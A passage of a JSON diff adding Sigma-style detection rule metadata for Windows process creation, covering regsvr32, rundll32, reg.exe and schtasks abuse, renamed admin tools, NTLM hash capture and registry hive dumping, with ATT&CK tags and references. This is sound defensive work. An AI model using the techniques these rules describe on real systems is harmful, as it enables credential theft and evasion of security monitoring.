"attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "value": "Suspicious Regsvr32 Execution With Image Extension" + }, + { + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_no_dll.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574", + "attack.execution" + ] + }, + "uuid": "50919691-7302-437f-8e10-1fe088afa145", + "value": "Regsvr32 Command Line Without DLL" + }, + { + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_remote_share.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "value": "Suspicious Regsvr32 Execution From Remote Share" + }, + { + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "meta": { + "author": "elhoim", + "creation_date": "2022/05/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_spawn_explorer.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-april-2022/", + "https://www.echotrail.io/insights/search/regsvr32.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", + "value": "Regsvr32 Spawning Explorer" + }, + { + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Rare legitimate add to registry via cli (to these locations)" + ], + "filename": "proc_creation_win_susp_reg_add.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562.001" + ] + }, + "uuid": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "value": "Reg Add Suspicious Paths" + }, + { + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "meta": { + "author": "frack113", + "creation_date": "2021/11/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_reg_bitlocker.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "value": "Suspicious Reg Add BitLocker" + }, + { + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "meta": { + "author": "Florian Roth, John Lambert (idea), elhoim", + "creation_date": "2021/07/14", + "falsepositive": [ + "Unknown", + "Other security solution installers" + ], + "filename": "proc_creation_win_susp_reg_disable_sec_services.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/1415295021041979392", + "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", + "https://vms.drweb.fr/virus/?i=24144899", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "5e95028c-5229-4214-afae-d653d573d0ec", + "value": "Reg Disable Security Service" + }, + { + "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_reg_open_command.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_open_command.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "value": "Suspicious Reg Add Open Command" + }, + { + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_renamed_adfind.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.joeware.net/freetools/tools/adfind/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" + ] + }, + "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "value": "Renamed AdFind Detection" + }, + { + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/20", + "falsepositive": [ + "Command lines that use the same flags" + ], + "filename": "proc_creation_win_susp_renamed_createdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://twitter.com/bopin2020/status/1366400799199272960", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "value": "Renamed CreateDump Process Dump" + }, + { + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/28", + "falsepositive": [ + "Unknown yet" + ], + "filename": "proc_creation_win_susp_renamed_dctask64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/gN3mes1s/status/1222088214581825540", + "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" + ] + }, + "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "value": "Renamed ZOHO Dctask64" + }, + { + "description": "Detects suspicious renamed SysInternals DebugView execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_renamed_debugview.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.epicturla.com/blog/sysinturla", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "value": "Renamed SysInternals Debug View" + }, + { + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/22", + "falsepositive": [ + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + ], + "filename": "proc_creation_win_susp_renamed_paexec.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "c4e49831-1496-40cf-8ce1-b53f942b02f9", + "value": "Renamed PAExec" + }, + { + "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_rpcping.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", + "https://twitter.com/vysecurity/status/974806438316072960", + "https://twitter.com/vysecurity/status/873181705024266241", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "93671f99-04eb-4ab4-a161-70d446a84003", + "value": "Capture Credentials with Rpcping.exe" + }, + { + "description": "Detects suspicious process related to rundll32 based on arguments", + "meta": { + "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_rundll32_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", + "https://twitter.com/Hexacorn/status/885258886428725250", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://twitter.com/nas_bench/status/1433344116071583746", + "https://twitter.com/eral4m/status/1479106975967240209", + "https://twitter.com/eral4m/status/1479080793003671557", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9", + "value": "Suspicious Rundll32 Activity" + }, + { + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/22", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" + ], + "filename": "proc_creation_win_susp_rundll32_by_ordinal.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", + "https://github.com/Neo23x0/DLLRunner", + "https://twitter.com/cyb3rops/status/1186631731543236608", + "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "value": "Suspicious Call by Ordinal" + }, + { + "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_rundll32_inline_vbs.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "value": "Suspicious Rundll32 Invoking Inline VBScript" + }, + { + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_rundll32_js_runhtmlapplication.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "value": "Rundll32 JS RunHTMLApplication Pattern" + }, + { + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/21", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_rundll32_keymgr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/NinjaParanoid/status/1516442028963659777", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ] + }, + "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "value": "Suspicious Key Manager Access" + }, + { + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/27", + "falsepositive": [ + "Possible but rare" + ], + "filename": "proc_creation_win_susp_rundll32_no_params.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.cobaltstrike.com/help-opsec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a", + "value": "Suspicious Rundll32 Without Any CommandLine Params" + }, + { + "description": "Detects suspicious process related to rundll32 based on arguments", + "meta": { + "author": "frack113", + "creation_date": "2021/12/04", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_rundll32_script_run.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", + "value": "Suspicious Rundll32 Script in CommandLine" + }, + { + "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", + "meta": { + "author": "Konstantin Grishchenko, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" + ], + "filename": "proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", + "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", + "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", + "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "285b85b1-a555-4095-8652-a8a4106af63f", + "value": "Suspicious Rundll32 Setupapi.dll Activity" + }, + { + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "meta": { + "author": "elhoim, CD_ROM_", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_rundll32_spawn_explorer.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_spawn_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "value": "RunDLL32 Spawning Explorer" + }, + { + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_rundll32_sys.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "731231b9-0b5d-4219-94dd-abb6959aa7ea", + "value": "Suspicious Rundll32 Activity Invoking Sys File" + }, + { + "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "meta": { + "author": "frack113", + "creation_date": "2022/06/04", + "falsepositive": [ + "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" + ], + "filename": "proc_creation_win_susp_rundll32_user32_dll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_user32_dll.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", + "value": "Suspicious Workstation Locking via Rundll32" + }, + { + "description": "This rule detects the execution of Run Once task as configured in the registry", + "meta": { + "author": "Avneet Singh @v3t0_, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_runonce_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/990717080805789697", + "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "198effb6-6c98-4d0c-9ea3-451fa143c45c", + "value": "Run Once Task Execution as Configured in Registry" + }, + { + "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_runscripthelper.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runscripthelper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03", + "value": "Suspicious Runscripthelper.exe" + }, + { + "description": "Detects suspicious process run from unusual locations", + "meta": { + "author": "juju4, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_run_locations.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://car.mitre.org/wiki/CAR-2013-05-002", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_run_locations.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" + ] + }, + "uuid": "15b75071-74cc-47e0-b4c6-b43744a62a2b", + "value": "Suspicious Process Start Locations" + }, + { + "description": "Detects execution of Remote Utilities RAT (RURAT) from an unsual location (outisde of 'C:\\Program Files')", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_rurat_exec_location.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "e01fa958-6893-41d4-ae03-182477c5e77d", + "value": "Execution of Remote Utilities RAT (RURAT) From Unusual Location" + }, + { + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_change.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "value": "Suspicious Modification Of Scheduled Tasks" + }, + { + "description": "Detects when adversaries stop services or processes by deleting their respective schdueled tasks in order to conduct data destructive activities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_schtasks_delete.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "value": "Delete Important Scheduled Task" + }, + { + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_schtasks_delete_all.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "value": "Delete All Scheduled Tasks" + }, + { + "description": "Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_disable.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "value": "Disable Important Scheduled Task" + }, + { + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/21", + "falsepositive": [ + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + ], + "filename": "proc_creation_win_susp_schtasks_env_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", + "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "81325ce1-be01-4250-944f-b4789644556f", + "value": "Suspicious Schtasks From Env Var Folder" + }, + { + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_folder_combos.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", + "value": "Schtasks From Suspicious Folders" + }, + { + "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/23", + "falsepositive": [ + "Software installers that run from temporary folders and also install scheduled tasks" + ], + "filename": "proc_creation_win_susp_schtasks_parent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "9494479d-d994-40bf-a8b1-eea890237021", + "value": "Suspicious Add Scheduled Task Parent" + }, + { + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/23", + "falsepositive": [ + "Software installers that run from temporary folders and also install scheduled tasks" + ], + "filename": "proc_creation_win_susp_schtasks_pattern.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + 